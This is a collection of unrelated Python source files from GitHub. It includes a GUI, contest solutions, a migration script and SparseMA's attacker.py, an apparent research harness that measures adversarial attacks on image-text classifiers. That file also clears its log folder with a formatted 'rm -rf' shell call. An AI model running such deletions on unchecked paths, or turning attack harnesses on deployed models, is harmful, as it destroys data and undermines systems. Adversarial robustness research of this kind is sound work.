course........\")\n self.console.update()\n this_input = self.entryCRN.get()\n # print(this_input)\n # Try to find the course in the ST:\n this_course = self.ST.get_node_by_ID(this_input)\n if this_course is None:\n self.statusBar.set(\"No such course found.\")\n self.console.update()\n return\n if this_course not in self.PersonObj.get_selectable_courses(self.ST):\n self.statusBar.set(\"Course cannot be selected, prerequisite not satisfied\")\n self.console.update()\n return\n self.filter(force_str=str(this_course))\n self.courseList_listbox.selection_set(0)\n self.just_add()\n self.filter(force_str=\"$RELOAD$\")\n self.statusBar.set(\"Course is added!!!!!\")\n self.console.update()\n\n def filter(self, force_str=None):\n \"\"\"\n Filter the selectable course by the given string, null string or default text will not be recognized\n :param force_str: the str used to adjust the status\n \"\"\"\n if force_str is not None:\n filter_text = force_str\n else:\n filter_text = self.Filter.get()\n if filter_text == \"\" or filter_text == \"Enter Text here\":\n return\n self.courseList_listbox.delete(0, self.courseList_listbox.size())\n if filter_text == \"$RELOAD$\":\n for item in self.PersonObj.get_selectable_courses(self.ST):\n self.courseList_listbox.insert(END, item)\n for item in self.PersonObj.get_selectable_courses_filtered(self.ST, filter_text):\n if str(item) not in self.added_list:\n self.courseList_listbox.insert(END, item)\n\n def goBack(self):\n \"\"\"\n Go back to the parent page\n \"\"\"\n self.parent.sub_page_name = None\n self.parent.sub_page_window = None\n self.master.destroy()\n\n\nclass requestWindow:\n \"\"\"\n The window for modifying the request\n \"\"\"\n\n def __init__(self, master, personObj=None, st=None):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n :param personObj: the Person class instance used to store user info\n :param st: the SkillTree instance for fetching the courses\n \"\"\"\n # Data segment\n self.page_name = pageEnum.requestWindow\n self.PersonObj = personObj\n self.ST = st\n self.requestinfo = None\n\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 1200) / 2)\n self.h = int((self.screen_height - 760) / 2)\n self.master.geometry(f'1200x760+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n\n # Available Request List\n self.avalFrame = LabelFrame(self.master, text=\"Available Request List: \", font=(\"Georgia\", 20))\n self.avalFrame.pack(side=TOP)\n self.avail_item = StringVar()\n self.avail_item.set(self.PersonObj.get_avail_request())\n self.avail_request = Listbox(self.avalFrame, width=67, height=35, listvariable=self.avail_item)\n self.avail_request.pack()\n self.avalFrame.place(x=50, y=0)\n\n # Accepted Request List\n self.acceptFrame = LabelFrame(self.master, text=\"Accepted Request List: \", font=(\"Georgia\", 20))\n self.acceptFrame.pack(side=TOP)\n self.accept_item = StringVar()\n self.accept_item.set(self.PersonObj.get_accept_request())\n self.accept_request = Listbox(self.acceptFrame, width=70, height=35, listvariable=self.accept_item)\n self.accept_request.pack()\n self.acceptFrame.place(x=610, y=0)\n\n # this is a button sample background\n self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n self.buttonImg = self.buttonImg.subsample(2, 2)\n\n # Accept button\n self.accept = Button(\n self.master,\n text=\"Accept>>\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.accept_move()\n )\n self.accept.config(image=self.buttonImg)\n self.accept.pack()\n self.accept.place(x=170, y=600)\n\n # remove button\n self.remove = Button(\n self.master,\n text=\"< chosen:\r\n return c\r\n return avail[0]\r\n\r\ndef war(naomi, ken):\r\n npoints = 0\r\n for n in reversed(naomi):\r\n k = next_higher(n, ken)\r\n if n > k:\r\n npoints += 1\r\n ken.remove(k)\r\n return npoints\r\n\r\ndef deceitwar(naomi, ken):\r\n pnaomi = 0\r\n while len(naomi) > 0:\r\n if naomi[0] > ken[0]:\r\n pnaomi += 1\r\n naomi.pop(0)\r\n ken.pop(0)\r\n else:\r\n naomi.pop(0)\r\n ken.pop()\r\n return pnaomi\r\n\r\nlines = [l.rstrip() for l in sys.stdin.readlines()]\r\nfor x in xrange(int(lines.pop(0))):\r\n naomi = sorted([float(i) for i in lines[x*3+1].split(' ')])\r\n ken = sorted([float(i) for i in lines[x*3+2].split(' ')])\r\n print(\"Case #%u: %u %u\" % (x + 1, deceitwar(naomi[:], ken[:]), war(naomi[:], ken[:])))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1720.py","file_name":"1720.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23380026361","text":"def checkXStraightx():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[i][j] != \"X\" and a[i][j] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkOStraightx():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[i][j] != \"O\" and a[i][j] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkXStraighty():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[j][i] != \"X\" and a[j][i] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkOStraighty():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[j][i] != \"O\" and a[j][i] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkXDiag1():\r\n for i in xrange(4):\r\n if(a[i][i] != \"X\" and a[i][i] != \"T\" ):\r\n return False\r\n return True\r\n\r\ndef checkODiag1():\r\n for i in xrange(4):\r\n if(a[i][i] != \"O\" and a[i][i] != \"T\" ):\r\n return False\r\n return True\r\n\r\ndef checkXDiag2():\r\n for i in xrange(4):\r\n if(a[i][3-i] != \"X\" and a[i][3-i] != \"T\" ):\r\n return False\r\n return True\r\n\r\ndef checkODiag2():\r\n for i in xrange(4):\r\n if(a[i][3-i] != \"O\" and a[i][3-i] != \"T\" ):\r\n return False\r\n return True\r\ndef checkunfilled():\r\n for i in xrange(4):\r\n for j in xrange(4):\r\n if(a[i][j] == \".\"):\r\n return True\r\n\r\nT = int(raw_input())\r\na = []\r\nfor testcase in xrange(T):\r\n a = []\r\n for rows in range(4):\r\n row = raw_input()\r\n a.append([row[0],row[1],row[2],row[3]])\r\n if(checkXStraightx() or checkXStraighty() or checkXDiag1()or checkXDiag2()):\r\n print(\"Case #\"+str(testcase+1)+\": X won\")\r\n elif(checkOStraightx() or checkOStraighty() or checkODiag1() or checkODiag2()):\r\n print(\"Case #\"+str(testcase+1)+\": O won\")\r\n elif(checkunfilled()):\r\n print(\"Case #\"+str(testcase+1)+\": Game has not completed\")\r\n else:\r\n print(\"Case #\"+str(testcase+1)+\": Draw\")\r\n raw_input()\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1699.py","file_name":"1699.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4998712860","text":"#!/usr/bin/python\nimport sys\n\nascii_chars = ' abcdefghijklmnopqrstuvwxyz'\ncount = 97\nascii_table = []\nfor letter in ascii_chars:\n values = {'char':letter,'dec':'','hex':''}\n if(letter == ' '):\n values['char'] = 'SPACE'\n values['dec'] = 32\n else: \n values['dec'] = count\n count+=1\n values['hex'] = hex(values['dec'])[2:]\n ascii_table.append(values) \n\ndef stringToHex(msg):\n hexmessage = ''\n for letter in msg:\n if(letter == ' '):\n letter = 'SPACE'\n ascii_position = 0\n while (ascii_position < len(ascii_table)):\n if(ascii_table[ascii_position]['char'] == letter):\n hexmessage += '\\\\x%s' %ascii_table[ascii_position]['hex']\n ascii_position += 1\n return hexmessage\nif (len(sys.argv) == 2):\n print(stringToHex(\"%s\" %sys.argv[1].lower()))\nelse:\n print('Parametros incorretos!')\n print('Modo de usar: ./ascii.py \"mensagem\"')\n#print(stringToHex(input(\"Digite a mensagem que voce quer... \")))\n","repo_name":"SorcererBR/asciitable","sub_path":"ascii.py","file_name":"ascii.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32273056006","text":"import logging\n\nfrom aquilon.aqdb.model import Machine\nfrom aquilon.worker.locks import CompileKey\nfrom aquilon.worker.templates.base import Plenary\nfrom aquilon.worker.templates.panutils import (StructureTemplate, pan_assign,\n pan_include, PanMetric,\n PanEscape)\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass PlenaryMachineInfo(Plenary):\n\n template_type = \"structure\"\n\n def __init__(self, dbmachine, logger=LOGGER):\n Plenary.__init__(self, dbmachine, logger=logger)\n self.machine = dbmachine.label\n\n loc = dbmachine.location\n self.hub = loc.hub.fullname.lower()\n self.building = loc.building.name\n self.city = loc.city.name\n self.continent = loc.continent.name\n\n if loc.rack:\n self.rack = loc.rack.name\n self.rackrow = loc.rack.rack_row\n self.rackcol = loc.rack.rack_column\n else:\n self.rack = None\n\n if loc.room:\n self.room = loc.room.name\n else:\n self.room = None\n\n if loc.bunker:\n self.bunker = loc.bunker.name\n else:\n self.bunker = None\n\n if loc.campus:\n self.campus = loc.campus.name\n else:\n self.campus = None\n\n self.dns_search_domains = []\n parents = loc.parents[:]\n parents.append(loc)\n parents.reverse()\n for parent in parents:\n # Filter out duplicates\n extra_domains = [map.dns_domain.name\n for map in parent.dns_maps\n if map.dns_domain.name not in self.dns_search_domains]\n self.dns_search_domains.extend(extra_domains)\n\n self.sysloc = loc.sysloc()\n\n # If this changes need to update machine_plenary_will_move() to match.\n self.plenary_core = \"machine/%(hub)s/%(building)s/%(rack)s\" % self.__dict__\n self.plenary_template = self.machine\n\n def get_key(self):\n host = self.dbobj.host\n container = self.dbobj.vm_container\n # Need a compile key if:\n # - There is a host attached.\n # - This is a virtual machine in a container.\n if not host and not container:\n return None\n # We have at least host or container, maybe both...\n if host:\n # PlenaryHost is actually a PlenaryCollection... can't call\n # get_key() directly, so using get_remove_key().\n ph = Plenary.get_plenary(host, logger=self.logger)\n host_key = ph.get_remove_key()\n if container:\n pc = Plenary.get_plenary(container, self.logger)\n container_key = pc.get_key()\n if not container:\n return host_key\n if not host:\n return container_key\n return CompileKey.merge([host_key, container_key])\n\n def body(self, lines):\n ram = [StructureTemplate(\"hardware/ram/generic\",\n {\"size\": PanMetric(self.dbobj.memory, \"MB\")})]\n cpus = []\n for cpu_num in range(self.dbobj.cpu_quantity):\n cpu = StructureTemplate(\"hardware/cpu/%s/%s\" %\n (self.dbobj.cpu.vendor.name,\n self.dbobj.cpu.name))\n cpus.append(cpu)\n\n disks = {}\n for disk in self.dbobj.disks:\n devname = disk.device_name\n params = {\"capacity\": PanMetric(disk.capacity, \"GB\"),\n \"interface\": disk.controller_type}\n if disk.bootable:\n params[\"boot\"] = True\n\n if disk.disk_type == 'local':\n tpl = StructureTemplate(\n (\"hardware/harddisk/generic/%s\" %\n disk.controller_type),\n params)\n\n if disk.controller_type == 'cciss':\n devname = \"cciss/\" + devname\n elif disk.disk_type == 'virtual_disk':\n share = disk.share\n\n params[\"path\"] = \"%s/%s.vmdk\" % (self.machine, disk.device_name)\n params[\"address\"] = disk.address\n params[\"sharename\"] = share.name\n params[\"server\"] = share.server\n params[\"mountpoint\"] = share.mount\n\n tpl = params\n\n disks[PanEscape(devname)] = tpl\n\n managers = {}\n interfaces = {}\n for interface in self.dbobj.interfaces:\n path = \"hardware/nic/%s/%s\" % (interface.model.vendor,\n interface.model)\n if interface.interface_type == 'public':\n ifinfo = {}\n if interface.mac:\n ifinfo[\"hwaddr\"] = interface.mac\n if interface.port_group:\n ifinfo[\"port_group\"] = interface.port_group\n if interface.bootable:\n ifinfo[\"boot\"] = interface.bootable\n interfaces[interface.name] = StructureTemplate(path, ifinfo)\n elif interface.interface_type == 'management':\n has_addr = False\n for addr in interface.assignments:\n has_addr = True\n manager = {\"hwaddr\": interface.mac}\n if addr.fqdns:\n manager[\"fqdn\"] = addr.fqdns[0]\n managers[addr.logical_name] = manager\n if not has_addr:\n managers[interface.name] = {\"hwaddr\": interface.mac}\n elif interface.interface_type == 'bonding':\n # Bonding interfaces need an entry under /hardware/cards/nic\n # only if the MAC address has been explicitely set\n if interface.mac:\n ifinfo = {\"hwaddr\": interface.mac}\n interfaces[interface.name] = StructureTemplate(path, ifinfo)\n\n # Firstly, location\n pan_assign(lines, \"location\", self.sysloc)\n pan_assign(lines, \"sysloc/building\", self.building)\n pan_assign(lines, \"sysloc/city\", self.city)\n pan_assign(lines, \"sysloc/continent\", self.continent)\n if self.rack:\n pan_assign(lines, \"rack/name\", self.rack)\n if self.rackrow:\n pan_assign(lines, \"rack/row\", self.rackrow)\n if self.rackcol:\n pan_assign(lines, \"rack/column\", self.rackcol)\n if self.room:\n pan_assign(lines, \"rack/room\", self.room)\n\n # And a chassis location?\n if self.dbobj.chassis_slot:\n slot = self.dbobj.chassis_slot[0]\n pan_assign(lines, \"chassis\", slot.chassis.fqdn)\n pan_assign(lines, \"slot\", slot.slot_number)\n\n #if self.hub:\n # pan_assign(lines, \"sysloc/hub\", self.hub)\n if self.campus:\n pan_assign(lines, \"sysloc/campus\", self.campus)\n if self.bunker:\n pan_assign(lines, \"sysloc/bunker\", self.bunker)\n if self.dns_search_domains:\n pan_assign(lines, \"sysloc/dns_search_domains\",\n self.dns_search_domains)\n\n # Now describe the hardware\n lines.append(\"\")\n if self.dbobj.serial_no:\n pan_assign(lines, \"serialnumber\", self.dbobj.serial_no)\n pan_assign(lines, \"nodename\", self.machine)\n pan_include(lines, \"hardware/machine/%s/%s\" %\n (self.dbobj.model.vendor.name, self.dbobj.model.name))\n\n lines.append(\"\")\n pan_assign(lines, \"ram\", ram)\n pan_assign(lines, \"cpu\", cpus)\n if disks:\n pan_assign(lines, \"harddisks\", disks)\n if interfaces:\n pan_assign(lines, \"cards/nic\", interfaces)\n\n # /hardware/console/preferred must be set, so we can't assign to\n # \"/console\" directly\n for manager in sorted(managers.keys()):\n pan_assign(lines, \"console/%s\" % manager, managers[manager])\n\n def write(self, *args, **kwargs):\n return Plenary.write(self, *args, **kwargs)\n\n\nPlenary.handlers[Machine] = PlenaryMachineInfo\n\n\ndef machine_plenary_will_move(old, new):\n \"\"\"Helper to see if updating a machine's location will move its plenary.\"\"\"\n if old.hub != new.hub or old.building != new.building or \\\n old.rack != new.rack:\n return True\n return False\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/templates/machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":8404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"6504233356","text":"import os\nimport json\nimport datetime\nimport numpy as np\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom config import *\nimport utils as util\nimport pickle\nimport datetime\nimport time\nimport language_tool_python\nimport torchvision.transforms as transforms\n\nclass Attacker(object):\n\n def __init__(self, model, config, attack_method):\n self.model = model\n self.config = config\n self.attack_method = attack_method\n\n self.attack_name = self.config.CONFIG['attack_name']\n # self.tool = language_tool_python.LanguageTool('en-US')\n \n \n self.save_sample = False\n self.sample_log_path = config.Common['sample_log_path']\n if self.sample_log_path != '':\n if not os.path.exists(self.sample_log_path):\n os.makedirs(self.sample_log_path)\n else:\n os.system('rm -rf {}'.format(self.sample_log_path))\n os.makedirs(self.sample_log_path)\n self.save_sample = True\n\n\n def start_attack(self, dataloader):\n attack_switch = self.config.Switch_Method['method']\n log = {}\n if attack_switch == 'One_Sample_Attack':\n index = getattr(self.config, attack_switch)['index']\n for i,(image, text, label) in enumerate(dataloader):\n if (i == index):\n log = self.one_sample_attack(image, text, label)\n break\n elif attack_switch == 'Batch_Sample_Attack':\n log = self.batch_sample_attack(dataloader, **getattr(self.config, attack_switch))\n\n return log\n\n\n\n def one_sample_attack(self, image, text, label):\n log = {}\n attack_log = self.attack_method.attack(image, text, label)\n log['pre_image_data'] = image\n log['pre_text_data'] = ' '.join(text)\n log['pre_label'] = label\n log.update(attack_log)\n return log\n\n def batch_sample_attack(self, data_loader, batch): \n log = {}\n # use = util.USE('./data/aux_files')\n\n ## Record the attack performance\n success = 0 # The sample number of successful attacks\n classify_true = 0 # The sample number of successfully classified after attacks\n sample_num = 0 # The total number of samples\n\n query_number_list = [] # The query number of each attack for target model\n image_perturbation_rate_list = [] # The perturbation rate of the adversarial example after each attack\n text_perturbation_rate_list = [] # The perturbation rate of the adversarial example after each attack\n process_time_list = [] # The processing time for each attack\n \n perturb_image_only = 0 # The number of adversarial examples which only perturb image\n perturb_text_only = 0 # The number of adversarial examples which only perturb text\n perturb_image_and_text = 0 # The number of adversarial examples which only perturb image and text\n \n image_sim_list = []\n text_sim_list = []\n\n\n for i in range(len(data_loader)):\n text, image, label = data_loader.__getitem__(i)\n # if i == batch:\n # break\n \n starttime = datetime.datetime.now()\n one_log = self.one_sample_attack(image, text, label)\n endtime = datetime.datetime.now()\n process_time = (endtime - starttime).seconds\n process_time_list.append(process_time)\n\n\n if not one_log['classification']:\n message = 'The {:3}-th sample is not correctly classified'.format(i)\n log['print_{}'.format(i)] = message\n print(message)\n \n continue\n\n sample_num += 1\n\n query_number = one_log['query_number']\n query_number_list.append(query_number)\n \n\n\n if(one_log['status']):\n success += 1\n \n ## Record the perturbation rate\n image_perturbation_rate = one_log['image_perturbation_rate']\n image_perturbation_rate_list.append(image_perturbation_rate)\n\n text_perturbation_rate = one_log['text_perturbation_rate']\n text_perturbation_rate_list.append(text_perturbation_rate)\n \n if image_perturbation_rate != 0 and text_perturbation_rate == 0:\n perturb_image_only += 1\n elif image_perturbation_rate == 0 and text_perturbation_rate != 0:\n perturb_text_only += 1\n else:\n perturb_image_and_text += 1\n \n adv_image_sim = one_log['adv_image_sim']\n adv_text_sim = one_log['adv_text_sim']\n image_sim_list.append(adv_image_sim)\n text_sim_list.append(adv_text_sim)\n \n \n if self.save_sample:\n adv_image = transforms.ToPILImage()(one_log['adv_image'])\n ori_image = transforms.ToPILImage()(image)\n adv_image.save(os.path.join(self.sample_log_path, '{}_adv.png'.format(i)))\n ori_image.save(os.path.join(self.sample_log_path, '{}_ori.png'.format(i)))\n adv_text = one_log['adv_text']\n ori_text = ' '.join(text)\n adv_label = one_log['adv_label']\n with open(os.path.join(self.sample_log_path, '{}_text.txt'.format(i)), 'w') as f:\n f.write('ori_text:\\t{}\\n'.format(ori_text))\n f.write('adv_text:\\t{}\\n'.format(adv_text))\n f.write('ori_label:\\t{}\\n'.format(str(label)))\n f.write('adv_label:\\t{}\\n'.format(str(adv_label)))\n f.write('\\n')\n f.write('image_perturbation_rate:\\t{}\\n'.format(str(image_perturbation_rate)))\n f.write('text_perturbation_rate:\\t{}\\n'.format(str(text_perturbation_rate)))\n f.write('\\n')\n f.write('adv_image_sim:\\t{}\\n'.format(str(adv_image_sim)))\n f.write('adv_text_sim:\\t{}\\n'.format(str(adv_text_sim)))\n \n\n message = 'The {:3}-th sample takes {:3}s, with the image perturbation rate: {:.5}, text perturbation rate {:.5}, semantic similarity: {:.5}, query number: {:4}. Attack succeeds.'.format(i, process_time, image_perturbation_rate, text_perturbation_rate, 0.0, query_number)\n print(message)\n else:\n classify_true += 1\n message = 'The {:3}-th sample takes {:3}s, Attack fails'.format(i, process_time)\n print(message)\n \n log['print_{}'.format(i)] = message\n \n message = '\\nA total of {:4} samples were selected, {:3} samples were correctly classified, {:3} samples were attacked successfully and {:4} samples failed'.format(batch, sample_num, success, sample_num - success)\n print(message)\n log['print_last'] = message\n\n\n acc = sample_num/batch # The classification accuracy of target model\n attack_acc = classify_true/batch # The classification accuracy of target model after attack\n success_rate = success/sample_num # The attack success rate of attack method\n average_image_perturbation_rate = np.mean(image_perturbation_rate_list).item() # The average perturbation rate of the adversarial example\n average_text_perturbation_rate = np.mean(text_perturbation_rate_list).item() # The average perturbation rate of the adversarial example\n # average_sim = np.mean(sim_list).item() # The average semantic similarity of the adversarial example\n average_image_sim = np.mean(image_sim_list).item()\n average_text_sim = np.mean(text_sim_list).item()\n\n average_query_number = np.mean(query_number_list).item() # The average query number of each attack\n average_process_time = np.mean(process_time_list).item() # The average process time of each attack\n \n\n log['acc'] = acc\n log['after_attack_acc'] = attack_acc\n log['attack_success_rate'] = success_rate\n log['average_image_perturbation_rate'] = average_image_perturbation_rate\n log['average_text_perturbation_rate'] = average_text_perturbation_rate\n \n log['perturb_image_only'] = perturb_image_only/max(1, success)\n log['perturb_text_only'] = perturb_text_only/max(1, success)\n log['perturb_image_and_text'] = perturb_image_and_text/max(1, success)\n \n log['adv_image_sim'] = average_image_sim\n log['adv_text_sim'] = average_text_sim\n\n log['average_query_number'] = average_query_number\n log['average_process_time'] = average_process_time\n \n return log\n\n ","repo_name":"JHL-HUST/SparseMA","sub_path":"user/attacker.py","file_name":"attacker.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42104589128","text":"#Двмерный массив\n'''\ndef show_matrix(matrix):\n for row in matrix: # запускает цикл каждый раз и у нас получается каждая строка\n for x in row: # выводит строку\n print(x, end=\" \")\n print()\n\nm = [[1, 2, 3], [2, 3, 4], [3, 4, 5]]\n\n\nshow_matrix(m)\n\n# print(m)\n# print(m[0])\n# print(m[0][1])\n'''\n\nimport random\n\ndef init_matrix(matrix, min_n, max_n):\n for i in range(len(matrix)):\n for j in range(len(len(matrix[0]))):\n matrix[i][j] = random.randint(min_n, max_n)\n\n\ndef show_matrix(matrix):\n for row in matrix:\n for x in row:\n print(x, end=\" \")\n print()\n\nn = 10\na = [[0]* n for i in range(n)]\n\ninit_matrix(a, 1, 101)\n\nshow_matrix(ф)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Oleg0079912/progr.1299.student","sub_path":"lessons_hillel/Lesson_3 (Двмерный массив).py","file_name":"Lesson_3 (Двмерный массив).py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32675528435","text":"from pose_pipeline import MODEL_DATA_DIR, TopDownPerson\nfrom pose_pipeline.env import add_path\nfrom dataclasses import dataclass\nfrom tqdm import tqdm\nimport numpy as np\nimport os\n\n\n@dataclass\nclass RIEArgs:\n causal: bool = False\n architecture: str = \"3,3,3,3,3\"\n dropout: float = 0.2\n channels: int = 256\n latent_features_dim: int = 512\n dense: bool = False\n stage: int = 1\n\n\ndef process_rie(key, batch_size=32, transform_coco=False):\n\n keypoints = (TopDownPerson & key).fetch1(\"keypoints\")\n N = keypoints.shape[0]\n\n if transform_coco:\n with add_path(os.environ[\"GAST_PATH\"]):\n from tools.preprocess import h36m_coco_format, revise_kpts\n\n keypoints_reformat, keypoints_score = keypoints[None, ..., :2], keypoints[None, ..., 2]\n keypoints_reformat, scores, valid_frames = h36m_coco_format(keypoints_reformat, keypoints_score)\n keypoints_reformat = revise_kpts(keypoints_reformat, scores, valid_frames)[0]\n\n valid_frames = np.array(valid_frames[0])\n keypoints = keypoints_reformat[valid_frames]\n\n else:\n valid_frames = np.arange(keypoints.shape[0])\n\n with add_path(os.environ[\"RIE_PATH\"]):\n\n import torch\n from common.generators import Evaluate_Generator\n from common.skeleton import Skeleton\n from common.model import RIEModel\n\n skeleton = Skeleton(\n parents=[\n -1,\n 0,\n 1,\n 2,\n 3,\n 4,\n 0,\n 6,\n 7,\n 8,\n 9,\n 0,\n 11,\n 12,\n 13,\n 14,\n 12,\n 16,\n 17,\n 18,\n 19,\n 20,\n 19,\n 22,\n 12,\n 24,\n 25,\n 26,\n 27,\n 28,\n 27,\n 30,\n ],\n joints_left=[6, 7, 8, 9, 10, 16, 17, 18, 19, 20, 21, 22, 23],\n joints_right=[1, 2, 3, 4, 5, 24, 25, 26, 27, 28, 29, 30, 31],\n )\n\n args = RIEArgs()\n\n filter_widths = [int(x) for x in args.architecture.split(\",\")]\n\n model_pos = RIEModel(\n 17,\n 2,\n skeleton.num_joints(),\n filter_widths=filter_widths,\n causal=args.causal,\n dropout=args.dropout,\n channels=args.channels,\n latten_features=args.latent_features_dim,\n dense=args.dense,\n is_train=False,\n Optimize1f=True,\n stage=args.stage,\n )\n\n checkpoint = os.path.join(MODEL_DATA_DIR, \"rie/cpn_pretrained.bin\")\n checkpoint_p = torch.load(checkpoint, map_location=lambda storage, loc: storage)\n\n pretrain_dict = checkpoint_p[\"model_pos\"]\n temp = pretrain_dict.items()\n model_dict = model_pos.state_dict()\n state_dict = {k: v for k, v in pretrain_dict.items() if k in model_dict.keys()}\n state_dict = {k: v for i, (k, v) in enumerate(state_dict.items()) if i < 317}\n\n model_dict.update(state_dict)\n model_pos.load_state_dict(model_dict)\n\n with torch.no_grad():\n model_pos.eval()\n\n receptive_field = model_pos.receptive_field()\n pad = (receptive_field - 1) // 2 # Padding on each side\n causal_shift = pad if args.causal else 0\n\n gen = Evaluate_Generator(\n batch_size=batch_size,\n cameras=None,\n poses_3d=None,\n poses_2d=[keypoints[:, :, :2]],\n chunk_length=1,\n shuffle=False,\n pad=pad,\n causal_shift=causal_shift,\n )\n\n results = []\n with torch.no_grad():\n for sample in tqdm(gen.next_epoch()):\n sample = sample[2]\n sample = torch.from_numpy(sample.astype(\"float32\")).contiguous()\n out = model_pos(sample)\n\n results.append(out.detach().cpu().numpy()[:, 0, ...])\n results = np.concatenate(results, axis=0) / 1000.0\n\n keypoints_3d = np.zeros((N, 17, 3))\n keypoints_3d[valid_frames] = results\n keypoints_valid = [i in valid_frames.tolist() for i in np.arange(keypoints.shape[0])]\n\n return {\"keypoints_3d\": keypoints_3d, \"keypoints_valid\": keypoints_valid}\n","repo_name":"peabody124/PosePipeline","sub_path":"pose_pipeline/wrappers/rie_lifting.py","file_name":"rie_lifting.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"61"} +{"seq_id":"34061962503","text":"\"\"\"postgres: Initialize imdb tables\n\nRevision ID: 5573c1201da3\nRevises: a7c0de3cdadd\nCreate Date: 2023-06-04 12:38:09.958297\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5573c1201da3'\ndown_revision = 'a7c0de3cdadd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade(engine_name: str) -> None:\n globals()[\"upgrade_%s\" % engine_name]()\n\n\ndef downgrade(engine_name: str) -> None:\n globals()[\"downgrade_%s\" % engine_name]()\n\n\ndef upgrade_postgresql() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n 'name_basics',\n sa.Column('nconst', sa.String(length=256), nullable=False),\n sa.Column('primary_name', sa.String(length=256), nullable=True),\n sa.Column('birth_year', sa.String(length=256), nullable=True),\n sa.Column('death_year', sa.String(length=256), nullable=True),\n sa.Column('primary_profession', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('known_for_titles', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.PrimaryKeyConstraint('nconst')\n )\n op.create_table(\n 'title_akas',\n sa.Column('title_id', sa.String(length=256), nullable=False),\n sa.Column('ordering', sa.Integer(), nullable=True),\n sa.Column('title', sa.String(length=256), nullable=True),\n sa.Column('region', sa.String(length=256), nullable=True),\n sa.Column('language', sa.String(length=256), nullable=True),\n sa.Column('types', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('attributes', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('is_original_title', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('title_id', 'ordering')\n )\n op.create_table(\n 'title_basics',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('title_type', sa.String(length=256), nullable=True),\n sa.Column('primary_title', sa.String(length=256), nullable=True),\n sa.Column('original_title', sa.String(length=256), nullable=True),\n sa.Column('is_adult', sa.Boolean(), nullable=True),\n sa.Column('start_year', sa.Integer(), nullable=True),\n sa.Column('end_year', sa.Integer(), nullable=True),\n sa.Column('runtime_minutes', sa.Integer(), nullable=True),\n sa.Column('genres', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n op.create_table(\n 'title_crew',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('directors', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('writers', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n op.create_table(\n 'title_episode',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('parent_tconst', sa.String(length=256), nullable=True),\n sa.Column('season_number', sa.Integer(), nullable=True),\n sa.Column('episode_number', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n op.create_table(\n 'title_principals',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('ordering', sa.Integer(), nullable=True),\n sa.Column('nconst', sa.String(length=256), nullable=True),\n sa.Column('category', sa.String(length=256), nullable=True),\n sa.Column('job', sa.String(length=512), nullable=True),\n sa.Column('characters', sa.String(length=512), nullable=True),\n sa.PrimaryKeyConstraint('tconst', 'ordering'),\n )\n op.create_table(\n 'title_ratings',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('average_rating', sa.Float(), nullable=True),\n sa.Column('num_votes', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade_postgresql() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('title_ratings')\n op.drop_table('title_principals')\n 